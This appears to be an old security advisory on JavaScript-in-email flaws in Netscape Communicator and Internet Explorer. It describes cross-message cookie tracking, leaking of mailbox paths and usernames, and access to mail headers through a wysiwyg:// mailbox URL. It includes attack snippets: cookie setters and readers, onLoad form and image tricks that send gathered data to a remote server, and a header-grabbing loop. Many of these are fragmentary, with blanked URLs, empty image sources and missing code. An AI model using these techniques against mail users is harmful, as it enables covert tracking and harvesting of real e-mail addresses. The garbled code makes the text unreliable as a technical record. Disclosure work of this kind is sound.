Netscape Communicator


    Netscape Communicator 4.5+, IE 4.01


    Claudio Telmon and  Gioacchino La Vecchia  found following.   They
    found the javascript  problem and a  couple of others  in January.
    They were  checking how  Communicator handles  javascript in  mail
    messages.  They made some testing and in February decided to  send
    a bug report to Netscape.

    Now to the bugs. As said, they were working on javascript in  mail
    messages, so they  noticed this bug  in mail messages.   A message
    sent to a public mailing list or a spam message can leave a "mark"
    in your  cookies database  that can  be read  by any other message
    (or web page?).  (tested also on Explorer and it worked)

    Now the  default setting  is that  javascript in  mail messages is
    disabled, but the bug is not fixed. As you noticed, "same  origin"
    is not enforced.  Another partially fixed bug is that with:


    you can access the first message of the mailbox.  They used:"wysiwig://0/mailbox:/home/claudio/nsmail/Inbox?number=2")

    With the original bug,  you could access document.links[]  and get
    the addresses  of sender,  recipient etc.   Now you  can still get
    document.title, which is the subject of the:

    If you try other  values instead of 2,  you can get the  offset of
    the beginning of another message in the mailbox and work on it, or
    else Communicator will crash.  The original report can be found at

    Here we go.  What authors  first found was how easily cookies  can
    be set  by a  piece of  Javascript code  in a  mail message.  This
    simple message body sets a cookie on the reader's system:

      function SetCookie (name, value, expdate) {
                  document.cookie = "Kerby" + name.substring(2,6) + "=" + escape
                (value) +
                    "; expires=" + expdate.toGMTString();

    The cookie is set  with a void domain.   Path is also void  unless
    explicitely set.  That is,  there is no information in  the cookie
    linking it to it's source  message, or to the sender's  address or
    domain.   These  cookies  can  be  read  by any Javascript code in
    subsequent mail messages, as shown by this code:

      function getCookieVal (offset) {
                  var endstr = document.cookie.indexOf (";", offset);
                  if (endstr == -1)
                    endstr = document.cookie.length;
                  return unescape(document.cookie.substring(offset, endstr));
                function GetCookie (name) {
                  var arg = name + "=";
                  var alen = arg.length;
                  var clen = document.cookie.length;
                  var i = 0;
                  while (i < clen) {
                    var j = i + alen;
                    if (document.cookie.substring(i, j) == arg)
                      return getCookieVal (j);
                    i = document.cookie.indexOf(" ", i) + 1;
                    if (i == 0) break;
                  return null;

    One preference that a user can set in Communicator is "Only accept
    cookies  originating  from  the  same  server  as  the  page being
    viewed"; setting  this property  does not  protect against cookies
    originating from mail messages, since all these cookies share  the
    same (void) "server".

    When received by a Web server, a cookie owns some properties  that
    limit it's  availability to  other servers.   This is  due to  the
    requirement to limit the ability of sites to map user's navigation
    history and  preferences.   This does  not hold  when cookies  are
    received via mail.  That is, it is fairly easy to map user's "mail
    history":  mailing  list  subscriptions,  previous   advertisement
    messages, etc.   These cookies can't  be sent to  Web servers, but
    their name and value can be used  to buid a URL, so in fact  their
    information can be disclosed to remote servers.  Suppose you  want
    to "cross-reference" the users of two mailing lists: all you  need
    to do is to send a message  on the first mailing list wich sets  a
    cookie  with  value  "1".  The  cookie  will  be available for any
    message of the second mailing list, that can do thing like:

        show a different message if the cookie is present; connect  to
        your web site with some HTML code like

        <IMG SRC="">

        enbedded  in  the  message;  this  would let you send targeted
        information and possibly map user's IP address or domain.

    The second step was gathering some sensitive information from  the
    user's browser.  This information can be put in the cookie or sent
    to a web site.  An  available value is location.href.  This  value
    is void when set from a mail message.  However, if the message  or
    an attachment is opened in a new browser window, the value is  set
    to the path of the message, that is someting like:


    where path is the "path"  of the mailbox and "data"  contains some
    information bound to the message  and the mailbox.  The  path also
    gives usually some  useful information: on  Windows systems it  is
    something  like:  C:\windows\temp\,  on  Linux (and possibly other
    Unix-like) it's someting like:


    This gives you both the username and the system type.   Vulnerable
    browsers Both Netscape Communicator and Internet Explorer disclose
    the path information.  However, the path information disclosed  by
    Internet Explorer  is less  sensitive.   This is  probably a  bug,
    since path information should not be available to javascript code.
    It's also the  worst problem we  found in this  research, since it
    can  disclose  the  actual  e-mail  address  of  the user, passing
    through anonymizers, forwarders and  firewalls.  This is  acheived
    if the username can  be bound to a  domain or IP address,  i.e. if
    the page connects  to a hostile  web server.   The use of  a proxy
    can  avoid  this  problem  in  some  situations.   Be it used with
    targeted messages or spam, it's  a powerful tools for real  e-mail
    addresses collection.  If the address is set in a cookie, it  will
    be  available  for  every  subsequent  message,  no matter who the
    sender is, without  requiring to use  the same trick  of opening a
    different window.  If encoded, the e-mail address can be difficult
    to recognize  even if  the cookie  file is  opened for inspection.
    Many are obvious, examples aren't probably needed.

    The previous step requires the message body to be opened in a  new
    window.  Since a user wouldn't in many cases open a new window  to
    see  a  message  or  an  attachment  (i.e. in a spam message), the
    message can do it himself:

      <script language="JavaScript">
                function clickit() {
                <body onLoad="click()">
                <A HREF="cid:kerby1.html">ciao</A>
                <FORM NAME="kerby1" ACTION="cid:kerby1.html" METHOD="post"
                <INPUT TYPE="hidden" NAME="Kerb" VALUE="">

    The trick is  the "cid:" that  refers to a  part of the  multipart
    mime message himself.   Let's take a  look a little  close to  the
    information we're been able to gather in such a way:



        PATHTOHOME is the  real path of  the user's home,  it could be
                   /home or /opt/home etc..
        PATHTOFOLDER is the real path of the mailbox, it could contain
                   information,   just    think   to    a   path    as
                   personal.sbd/contacts.sbd/ACMEWORKS where ACMEWORKS
                   is the worst competitor of your boss
        OFFSET is the offset of the message in the mailbox, in bytes.

    Cookies can be useful  to pass information between  mail messages,
    but can be refused or detected by  the user.  If the need is  just
    to send  the sensitive  information to  a web  site, maybe  a less
    detectable way can be useful.   Moreover, opening a window can  be
    suspect, so it's probably  better to avoid it  at all.  This  code
    does exactly this:

      <script language="JavaScript">
                function swapImage() {
                <body onLoad="swapImage()">
                <FORM NAME="kerby1" ACTION="cid:kerby1.html" METHOD="post"
                 <INPUT TYPE="hidden" NAME="Kerb" VALUE="">
                <IMG NAME="kerbimg" SRC="">

    It sends the information embedded in the URL of an embedded  image
    and doesn't  open any  window, since  the information  is gathered
    from  the  form  (which  btw.  doesn't  give any warning since the
    action is not performed).  This code exposes two waeknesses.   The
    first one is a consequence of the already discussed ones, that  is
    sending  sensitive  information  without  the  user  being able to
    avoid  it.   The  second  one  is  however the most important one:
    while form  actions under  certain conditions  (specificare) can't
    be  performed  without  user's  approval  or  explicit action, the
    informations  are  available  in  the  page for different handling
    and, in this case, for different ways of submission.

    When  displayed  an   e-mail  message  shows   a  list  of   links
    corresponding to a subset of the headers of the message.   Sender,
    Message-ID, From, To and References fields are shown as links.   A
    Javascript hostile code is able to grab these links's values  pack
    and deliver them to an attacker.  Some of these links's values are
    not always accessible (their  value is foo when  Communicator adds
    the addbook:), but  in some cases  they can be  accessed.  One  is
    this URL:


    where the mailbox is the  current mailbox.  Note that  the mailbox
    can be  easily gathered  using one  of the  previous bugs  (or the
    default Inbox  can be  tried).   The offset=2  points to the first
    message inserted in the mailbox.  Trying to access other  messages
    with tentative  offsets always  crashed Communicator,  but if  the
    correct offset  of a  message (or  its id)  can be  found, the URL
    works.  This vulnerability  lets potentially everyone browse  your
    mailboxes and get as many  informations he needs about people  you
    are exchanging message  with. Not less  important this is  an easy
    way to discover  real mail addresses  of people who  stay behind a

                for ( i = 0; i <addrnumb; i++) {


    Should be fixed already...  It's not clear if setting cookies with
    mail messages is  correct and useful;  it's probably better  to be
    able to  disable.   This feature  with a  specific option (the way
    javascript in mail messages can be now separately disabled).   The
    biggest problem is  however that there  is no server  information.
    Setting  this  information  to  the  sender  address  could  be  a
    solution, but  the sender  of a  message can  be trivially forged.
    Cookies  set  by  mail  messages  should  be probably protected as
    sensitive information,  that is  no information  derived from them
    sould be sent  over the Internet  URL information.   The URL of  a
    mail message contains sensitive information (in both  Communicator
    and  Internet  Explorer  it  contains  at  least  a  path).    The
    availability of  this information  to javascript  code is probably
    just a bug that needs to be corrected.